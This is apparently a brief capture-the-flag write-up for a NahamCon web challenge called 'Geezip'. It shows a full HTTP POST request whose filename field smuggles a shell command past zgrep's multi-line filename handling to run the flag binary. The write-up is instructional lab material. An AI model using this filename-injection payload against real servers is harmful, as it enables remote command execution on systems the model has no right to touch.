Geezip

This is a web application that allows us to gzip content and provides a summary using zgrep. I found a recent vulnerability in zgrep that leads to RCE when using multi-line file names.

However, slashes (/) won't work in the filename, so we need to do something like the following to run the get_flag binary in the root directory:

cd .. && export PATH=. && get_flag

Placing the above payload into our filename:

POST / HTTP/1.1
Host: challenge.nahamcon.com:31694
Content-Length: 91

...

Connection: close

action=submit&filename=|
;e cd+..+%26%26+export+PATH%3d.+%26%26+get_flag
#.gz&contents=test